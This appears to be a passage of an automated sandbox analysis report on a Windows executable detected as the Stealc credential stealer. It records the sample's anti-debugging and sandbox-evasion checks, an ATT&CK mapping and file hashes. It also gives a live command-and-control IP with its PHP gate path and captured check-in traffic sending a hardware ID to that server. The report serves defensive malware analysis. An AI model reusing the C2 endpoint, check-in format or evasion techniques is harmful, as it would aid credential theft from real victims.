                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00963EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00963EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009516D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0095DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0095BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00951160 GetSystemInfo,ExitProcess,0_2_00951160
                Source: file.exe, file.exe, 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1721406629.0000000000612000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1721406629.00000000005E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13550
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13547
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13561
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13601
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13569
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009545C0 VirtualProtect ?,00000004,00000100,000000000_2_009545C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00969860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00969860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00969750 mov eax, dword ptr fs:[00000030h]0_2_00969750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009678E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_009678E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2316, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00969600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00969600
                Source: file.exeBinary or memory string: : 'Program Manager
                Source: file.exe, 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 'Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00967B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00967980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00967980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00967850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00967850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00967A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00967A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.950000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1680234498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2316, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.950000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1680234498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2316, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.phpN17%VirustotalBrowse
                http://185.215.113.37/p17%VirustotalBrowse
                http://185.215.113.37/ws17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpy17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpNfile.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/pfile.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37=file.exe, 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/wsfile.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.37/e2b1563c6670f193.phpyfile.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmptrueunknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.215.113.37
                  		unknownPortugal
                  		206894WHOLESALECONNECTIONSNLtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1524645
                  Start date and time:2024-10-03 03:00:07 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 3m 14s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:1
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 81%
                  • Number of executed functions: 18
                  • Number of non-executed functions: 83
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Stop behavior analysis, all processes terminated

                  Warnings

                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  PwjUL1lEEC.exeGet hashmaliciousAmadey, Credential Flusher, StealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                  • 185.215.113.103
                  zKxfw9WFdt.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16
                  dXDaTWHYvF.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.43
                  PwjUL1lEEC.exeGet hashmaliciousAmadey, Credential Flusher, StealcBrowse
                  • 185.215.113.103
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.9474795859335305
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:1'821'184 bytes
                  MD5:9230158d2d15f5f7140b53912347a845
                  SHA1:01d78cba09eca8d00ad54454ef652b24321bb00d
                  SHA256:403a726fd6b597b2646fb61f309d5e59f8b33be15b697b6cac53686580e9fce1
                  SHA512:6f497d06667a772f1d46e98ff7bc0635f7c30505474c74c137541083dbe7d3eb13849176814892eba0ce3a1b6dc4cdd11cdc31a9e74d4ee32dcb61f2a0ca19ee
                  SSDEEP:49152:FyjyDUkCe1uiGY9rqfrwgzLoZ5G/XTlpvbvu8y:IjS+e/f4wiLoSblBNy
                  TLSH:6185333A13AE8A50EF93DABE3A988052A08470F5C93EC9371D4D11DD99DF32DF142536
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                  File Icon

                  Icon Hash:90cececece8e8eb0

                  Static PE Info

                  General

                  Entrypoint:0xa8d000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                  Entrypoint Preview

                  Instruction
                  jmp 00007FD2D06BF9FAh
                  push gs
                  sbb eax, dword ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  jmp 00007FD2D06C19F5h
                  add byte ptr [ebx], al
                  or al, byte ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], dl
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [ebx], cl
                  or al, byte ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [ebx], al
                  or al, byte ptr [eax]
                  add byte ptr [ebx], cl
                  or al, byte ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [esi], al
                  add byte ptr [eax], 00000000h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  adc byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add al, 0Ah
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Rich Headers

                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [LNK] VS2010 build 30319

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  0x10000x25b0000x22800963167053693e58a7c0e2dae805eb176unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  0x25e0000x2970000x20014d33eba56c6689423cff9f180d5e709unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  rdaizazf0x4f50000x1970000x1968006db525358a51dec5160c6d5c93a67992False0.9948355098785363data7.953372032997779IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  hwyhwwjx0x68c0000x10000x400b838517598b8d947ac904565722a9e4fFalse0.78515625data6.159591151563208IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant0x68d0000x30000x2200f7826863dac99eda8183cdbcd351bfeaFalse0.06364889705882353DOS executable (COM)0.6858727345179028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                  Imports

                  DLLImport
                  kernel32.dlllstrcpy

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-10-03T03:01:01.691850+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 3, 2024 03:01:00.755705118 CEST4973080192.168.2.4185.215.113.37
                  Oct 3, 2024 03:01:00.760701895 CEST8049730185.215.113.37192.168.2.4
                  Oct 3, 2024 03:01:00.760799885 CEST4973080192.168.2.4185.215.113.37
                  Oct 3, 2024 03:01:00.760943890 CEST4973080192.168.2.4185.215.113.37
                  Oct 3, 2024 03:01:00.765695095 CEST8049730185.215.113.37192.168.2.4
                  Oct 3, 2024 03:01:01.461486101 CEST8049730185.215.113.37192.168.2.4
                  Oct 3, 2024 03:01:01.461559057 CEST4973080192.168.2.4185.215.113.37
                  Oct 3, 2024 03:01:01.467344999 CEST4973080192.168.2.4185.215.113.37
                  Oct 3, 2024 03:01:01.472189903 CEST8049730185.215.113.37192.168.2.4
                  Oct 3, 2024 03:01:01.691668987 CEST8049730185.215.113.37192.168.2.4
                  Oct 3, 2024 03:01:01.691849947 CEST4973080192.168.2.4185.215.113.37
                  Oct 3, 2024 03:01:05.547985077 CEST4973080192.168.2.4185.215.113.37

                  HTTP Request Dependency Graph

                  • 185.215.113.37

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449730185.215.113.37802316C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Oct 3, 2024 03:01:00.760943890 CEST89OUTGET / HTTP/1.1
                  Host: 185.215.113.37
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Oct 3, 2024 03:01:01.461486101 CEST203INHTTP/1.1 200 OK
                  Date: Thu, 03 Oct 2024 01:01:01 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 0
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Oct 3, 2024 03:01:01.467344999 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                  Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAE
                  Host: 185.215.113.37
                  Content-Length: 211
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 30 36 30 41 42 33 46 39 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 2d 2d 0d 0a
                  Data Ascii: ------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="hwid"3A060AB3F9603810289448------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="build"doma------AKEGDAKEHJDHIDHJJDAE--
                  Oct 3, 2024 03:01:01.691668987 CEST210INHTTP/1.1 200 OK
                  Date: Thu, 03 Oct 2024 01:01:01 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 8
                  Keep-Alive: timeout=5, max=99
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 59 6d 78 76 59 32 73 3d
                  Data Ascii: YmxvY2s=


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  System Behavior

                  General

                  Target ID:0
                  Start time:21:00:58
                  Start date:02/10/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x950000
                  File size:1'821'184 bytes
                  MD5 hash:9230158D2D15F5F7140B53912347A845
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
